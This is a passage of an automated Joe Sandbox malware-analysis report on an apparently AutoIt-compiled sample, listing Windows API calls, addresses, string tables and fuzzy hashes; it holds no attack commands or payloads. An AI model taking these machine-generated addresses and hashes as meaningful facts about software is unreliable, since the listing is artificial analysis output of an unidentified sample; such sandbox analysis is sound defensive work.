                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID:
                                    • API String ID: 3964851224-0
                                    Similarity
                                    • API ID: Exception@8Throwstd::exception::exception
                                    • String ID:
                                    • API String ID: 3728558374-0
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 009DA2FE
                                    • DeleteObject.GDI32(00000000), ref: 009DA310
                                    • DestroyWindow.USER32 ref: 009DA31E
                                    • GetDesktopWindow.USER32 ref: 009DA338
                                    • GetWindowRect.USER32(00000000), ref: 009DA33F
                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 009DA480
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 009DA490
                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA4D8
                                    • GetClientRect.USER32(00000000,?), ref: 009DA4E4
                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 009DA51E
                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA540
                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA553
                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA55E
                                    • GlobalLock.KERNEL32(00000000), ref: 009DA567
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA576
                                    • GlobalUnlock.KERNEL32(00000000), ref: 009DA57F
                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA586
                                    • GlobalFree.KERNEL32(00000000), ref: 009DA591
                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA5A3
                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00A0D9BC,00000000), ref: 009DA5B9
                                    • GlobalFree.KERNEL32(00000000), ref: 009DA5C9
                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 009DA5EF
                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 009DA60E
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA630
                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA81D
                                    Similarity
                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                    • String ID: $AutoIt v3$DISPLAY$static
                                    • API String ID: 2211948467-2373415609
                                    APIs
                                    • SetTextColor.GDI32(?,00000000), ref: 009ED2DB
                                    • GetSysColorBrush.USER32(0000000F), ref: 009ED30C
                                    • GetSysColor.USER32(0000000F), ref: 009ED318
                                    • SetBkColor.GDI32(?,000000FF), ref: 009ED332
                                    • SelectObject.GDI32(?,00000000), ref: 009ED341
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 009ED36C
                                    • GetSysColor.USER32(00000010), ref: 009ED374
                                    • CreateSolidBrush.GDI32(00000000), ref: 009ED37B
                                    • FrameRect.USER32(?,?,00000000), ref: 009ED38A
                                    • DeleteObject.GDI32(00000000), ref: 009ED391
                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 009ED3DC
                                    • FillRect.USER32(?,?,00000000), ref: 009ED40E
                                    • GetWindowLongW.USER32(?,000000F0), ref: 009ED439
                                      • Part of subcall function 009ED575: GetSysColor.USER32(00000012), ref: 009ED5AE
                                      • Part of subcall function 009ED575: SetTextColor.GDI32(?,?), ref: 009ED5B2
                                      • Part of subcall function 009ED575: GetSysColorBrush.USER32(0000000F), ref: 009ED5C8
                                      • Part of subcall function 009ED575: GetSysColor.USER32(0000000F), ref: 009ED5D3
                                      • Part of subcall function 009ED575: GetSysColor.USER32(00000011), ref: 009ED5F0
                                      • Part of subcall function 009ED575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 009ED5FE
                                      • Part of subcall function 009ED575: SelectObject.GDI32(?,00000000), ref: 009ED60F
                                      • Part of subcall function 009ED575: SetBkColor.GDI32(?,00000000), ref: 009ED618
                                      • Part of subcall function 009ED575: SelectObject.GDI32(?,?), ref: 009ED625
                                      • Part of subcall function 009ED575: InflateRect.USER32(?,000000FF,000000FF), ref: 009ED644
                                      • Part of subcall function 009ED575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009ED65B
                                      • Part of subcall function 009ED575: GetWindowLongW.USER32(00000000,000000F0), ref: 009ED670
                                      • Part of subcall function 009ED575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 009ED698
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                    • String ID:
                                    • API String ID: 3521893082-0
                                    • Opcode ID: 5d76514888c24f36e22e505fb9d2878b3e03285ee03389700da2772393751a02
                                    • Instruction ID: 22b01dfa67d5b773daaec41a9384f438b570f8cdebb3507306c50e88b4f286e1
                                    • Opcode Fuzzy Hash: 5d76514888c24f36e22e505fb9d2878b3e03285ee03389700da2772393751a02
                                    • Instruction Fuzzy Hash: 90919072009305BFCB11DFA4DC08E6B7BA9FF89325F101A19F962961E0D771E946CB52
                                    APIs
                                    • DestroyWindow.USER32 ref: 0099B98B
                                    • DeleteObject.GDI32(00000000), ref: 0099B9CD
                                    • DeleteObject.GDI32(00000000), ref: 0099B9D8
                                    • DestroyCursor.USER32(00000000), ref: 0099B9E3
                                    • DestroyWindow.USER32(00000000), ref: 0099B9EE
                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 009FD2AA
                                    • 6F540200.COMCTL32(?,000000FF,?), ref: 009FD2E3
                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 009FD711
                                      • Part of subcall function 0099B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0099B759,?,00000000,?,?,?,?,0099B72B,00000000,?), ref: 0099BA58
                                    • SendMessageW.USER32 ref: 009FD758
                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 009FD76F
                                    • 6F520860.COMCTL32(00000000), ref: 009FD785
                                    • 6F520860.COMCTL32(00000000), ref: 009FD790
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: DestroyMessageSendWindow$DeleteF520860Object$CursorF540200InvalidateMoveRect
                                    • String ID: 0
                                    • API String ID: 2041435895-4108050209
                                    • Opcode ID: 1e077cb47da794e8865d6a5d03b1aacefd49b0d29ac900d584c9ce794219f671
                                    • Instruction ID: b2bd6985677e44a44e39dc0745d8e8f43a03c227e0c2e42f382d065bef6a7456
                                    • Opcode Fuzzy Hash: 1e077cb47da794e8865d6a5d03b1aacefd49b0d29ac900d584c9ce794219f671
                                    • Instruction Fuzzy Hash: 4112AC71205209DFDB11CF68D988BB9B7EABF45308F144569FA89CB262C735EC42CB91
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 009CDBD6
                                    • GetDriveTypeW.KERNEL32(?,00A1DC54,?,\\.\,00A1DC00), ref: 009CDCC3
                                    • SetErrorMode.KERNEL32(00000000,00A1DC54,?,\\.\,00A1DC00), ref: 009CDE29
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DriveType
                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                    • API String ID: 2907320926-4222207086
                                    • Opcode ID: 62e5ea2bb55f5ffececd4271dd50435bbb2159ca64354a5cf9c58d7cfbbfe1eb
                                    • Instruction ID: daec9203a21439b55efc8f0ec1479911cd5a9ce970fc966481552adbafb66434
                                    • Opcode Fuzzy Hash: 62e5ea2bb55f5ffececd4271dd50435bbb2159ca64354a5cf9c58d7cfbbfe1eb
                                    • Instruction Fuzzy Hash: 59518B31E49302ABCA00EF24C882F29B7A4FB94705F205D6EF0479B6D1DA64D946DB43
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                    • API String ID: 1038674560-86951937
                                    • Opcode ID: 46a120d891c26b24d8e4da31d121bce80c1b9045d717a432cc0539c580bf0c19
                                    • Instruction ID: cb1f4289207b43232f8fdced7f53c223ad779521a6a0f1f35de00fdb29f945f1
                                    • Opcode Fuzzy Hash: 46a120d891c26b24d8e4da31d121bce80c1b9045d717a432cc0539c580bf0c19
                                    • Instruction Fuzzy Hash: 0081F7B1640219BBCB24BB68DD82FBF777CAF65310F144429F905AA2C2EB74D941C7A1
                                    APIs
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 009EC788
                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 009EC83E
                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 009EC859
                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 009ECB15
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window
                                    • String ID: 0
                                    • API String ID: 2326795674-4108050209
                                    • Opcode ID: 18084bb29713178b6cf7b8b5532d538b7434d5d6feb05a772c05c1b832073461
                                    • Instruction ID: 0cade907614004d0198ee3401a8c65e136ff1c81d9962cecc614b7244ae80db7
                                    • Opcode Fuzzy Hash: 18084bb29713178b6cf7b8b5532d538b7434d5d6feb05a772c05c1b832073461
                                    • Instruction Fuzzy Hash: E8F1E2B1104385AFD722CF65CC89BAABBE8FF49314F080929F5C9962A1C775DC42CB91
                                    APIs
                                    • CharUpperBuffW.USER32(?,?,00A1DC00), ref: 009E6449
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                    • API String ID: 3964851224-45149045
                                    • Opcode ID: 7b26a310e4f9a28409c524a91571376b13711770b6c96b3774dd3a08578ac7d4
                                    • Instruction ID: 50d3ccdbe9b8a773120d9284614350b8c29c5570b082d22901d9bfd971a6a8f1
                                    • Opcode Fuzzy Hash: 7b26a310e4f9a28409c524a91571376b13711770b6c96b3774dd3a08578ac7d4
                                    • Instruction Fuzzy Hash: A1C180302043858BCB05EF15C551BBE77A5BFE8394F044859F8965B3E2EB25ED4ACB82
                                    APIs
                                    • GetSysColor.USER32(00000012), ref: 009ED5AE
                                    • SetTextColor.GDI32(?,?), ref: 009ED5B2
                                    • GetSysColorBrush.USER32(0000000F), ref: 009ED5C8
                                    • GetSysColor.USER32(0000000F), ref: 009ED5D3
                                    • CreateSolidBrush.GDI32(?), ref: 009ED5D8
                                    • GetSysColor.USER32(00000011), ref: 009ED5F0
                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 009ED5FE
                                    • SelectObject.GDI32(?,00000000), ref: 009ED60F
                                    • SetBkColor.GDI32(?,00000000), ref: 009ED618
                                    • SelectObject.GDI32(?,?), ref: 009ED625
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 009ED644
                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009ED65B
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 009ED670
                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 009ED698
                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 009ED6BF
                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 009ED6DD
                                    • DrawFocusRect.USER32(?,?), ref: 009ED6E8
                                    • GetSysColor.USER32(00000011), ref: 009ED6F6
                                    • SetTextColor.GDI32(?,00000000), ref: 009ED6FE
                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 009ED712
                                    • SelectObject.GDI32(?,009ED2A5), ref: 009ED729
                                    • DeleteObject.GDI32(?), ref: 009ED734
                                    • SelectObject.GDI32(?,?), ref: 009ED73A
                                    • DeleteObject.GDI32(?), ref: 009ED73F
                                    • SetTextColor.GDI32(?,?), ref: 009ED745
                                    • SetBkColor.GDI32(?,?), ref: 009ED74F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                    • String ID:
                                    • API String ID: 1996641542-0
                                    • Opcode ID: de0b57788f423d3a4420bd59e4ef098c5b26168cb624ef2407952087d024fcd2
                                    • Instruction ID: 8f72f958d7a00d0a971f5d197274771861ad16fbdc85478f68d1705e63090808
                                    • Opcode Fuzzy Hash: de0b57788f423d3a4420bd59e4ef098c5b26168cb624ef2407952087d024fcd2
                                    • Instruction Fuzzy Hash: 6F514B72901208AFDF11DFE9DC48AAE7B79FB08320F104615FA15AB2A1DB759A42CB50
                                    APIs
                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 009EB7B0
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009EB7C1
                                    • CharNextW.USER32(0000014E), ref: 009EB7F0
                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 009EB831
                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 009EB847
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009EB858
                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 009EB875
                                    • SetWindowTextW.USER32(?,0000014E), ref: 009EB8C7
                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 009EB8DD
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 009EB90E
                                    • _memset.LIBCMT ref: 009EB933
                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 009EB97C
                                    • _memset.LIBCMT ref: 009EB9DB
                                    • SendMessageW.USER32 ref: 009EBA05
                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 009EBA5D
                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 009EBB0A
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 009EBB2C
                                    • GetMenuItemInfoW.USER32(?), ref: 009EBB76
                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009EBBA3
                                    • DrawMenuBar.USER32(?), ref: 009EBBB2
                                    • SetWindowTextW.USER32(?,0000014E), ref: 009EBBDA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                    • String ID: 0
                                    • API String ID: 1073566785-4108050209
                                    • Opcode ID: adbfc5d8f2f07508811f0b081fc9aab625c45ba3536e667f821e7322701b7173
                                    • Instruction ID: 5e697ceb5d405155a16b8dcdba2f4fe92173f1dd9be55fa842c45428c5e82e3e
                                    • Opcode Fuzzy Hash: adbfc5d8f2f07508811f0b081fc9aab625c45ba3536e667f821e7322701b7173
                                    • Instruction Fuzzy Hash: E6E1BF75900258ABDF22CFA2CC84AEF7B78FF45710F148156FA19AA291D7758E42CF60
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 009E778A
                                    • GetDesktopWindow.USER32 ref: 009E779F
                                    • GetWindowRect.USER32(00000000), ref: 009E77A6
                                    • GetWindowLongW.USER32(?,000000F0), ref: 009E7808
                                    • DestroyWindow.USER32(?), ref: 009E7834
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 009E785D
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009E787B
                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 009E78A1
                                    • SendMessageW.USER32(?,00000421,?,?), ref: 009E78B6
                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 009E78C9
                                    • IsWindowVisible.USER32(?), ref: 009E78E9
                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 009E7904
                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 009E7918
                                    • GetWindowRect.USER32(?,?), ref: 009E7930
                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 009E7956
                                    • GetMonitorInfoW.USER32 ref: 009E7970
                                    • CopyRect.USER32(?,?), ref: 009E7987
                                    • SendMessageW.USER32(?,00000412,00000000), ref: 009E79F2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                    • String ID: ($0$tooltips_class32
                                    • API String ID: 698492251-4156429822
                                    • Opcode ID: 3beed2f004dda1074709672bc5982ea7207ce8f039d0819923e1bb4d7d611ffa
                                    • Instruction ID: b38087716298c4adc6a63f92e2187a8abfd89031a5f056d15bb6f610c37bf45e
                                    • Opcode Fuzzy Hash: 3beed2f004dda1074709672bc5982ea7207ce8f039d0819923e1bb4d7d611ffa
                                    • Instruction Fuzzy Hash: 6CB16A71608341AFDB05DFA5C988B6AFBE5BF88310F00891DF5999B291DB71EC05CB92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _wcscat$D315$D31560_wcscmp_wcscpy_wcsncpy_wcsstr
                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                    • API String ID: 2463055960-1459072770
                                    • Opcode ID: f9079e5deb8b8512d753046cfa5c7deda4d7c33b58af2d883547344e40084871
                                    • Instruction ID: f9015f5ac8b8c7d3e98471c94a52ebbdf3454900a3570d281fcc99a7cf45682a
                                    • Opcode Fuzzy Hash: f9079e5deb8b8512d753046cfa5c7deda4d7c33b58af2d883547344e40084871
                                    • Instruction Fuzzy Hash: FE41D972A002047BEB00AB78DC47FBF777CEF86710F044869F905E6182EB759A01D6A6
                                    APIs
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0099A939
                                    • GetSystemMetrics.USER32(00000007), ref: 0099A941
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0099A96C
                                    • GetSystemMetrics.USER32(00000008), ref: 0099A974
                                    • GetSystemMetrics.USER32(00000004), ref: 0099A999
                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0099A9B6
                                    • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0099A9C6
                                    • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0099A9F9
                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0099AA0D
                                    • GetClientRect.USER32(00000000,000000FF), ref: 0099AA2B
                                    • GetStockObject.GDI32(00000011), ref: 0099AA47
                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0099AA52
                                      • Part of subcall function 0099B63C: GetCursorPos.USER32(000000FF), ref: 0099B64F
                                      • Part of subcall function 0099B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0099B66C
                                      • Part of subcall function 0099B63C: GetAsyncKeyState.USER32(00000001), ref: 0099B691
                                      • Part of subcall function 0099B63C: GetAsyncKeyState.USER32(00000002), ref: 0099B69F
                                    • SetTimer.USER32(00000000,00000000,00000028,0099AB87), ref: 0099AA79
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                    • String ID: AutoIt v3 GUI
                                    • API String ID: 1458621304-248962490
                                    • Opcode ID: dd4699112f2312702ccdfe2d859653ed77b593780b89eead1d50c6b8200ec006
                                    • Instruction ID: 0f915360ab4d3edfa2e098a95ee6bb7a8bbb97a28c30b07d64f3928cd11995dc
                                    • Opcode Fuzzy Hash: dd4699112f2312702ccdfe2d859653ed77b593780b89eead1d50c6b8200ec006
                                    • Instruction Fuzzy Hash: D4B1AB75A0120AAFDF14DFE8CC45BAE7BB9FB48310F114219FA05A7290DB74E842CB51
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
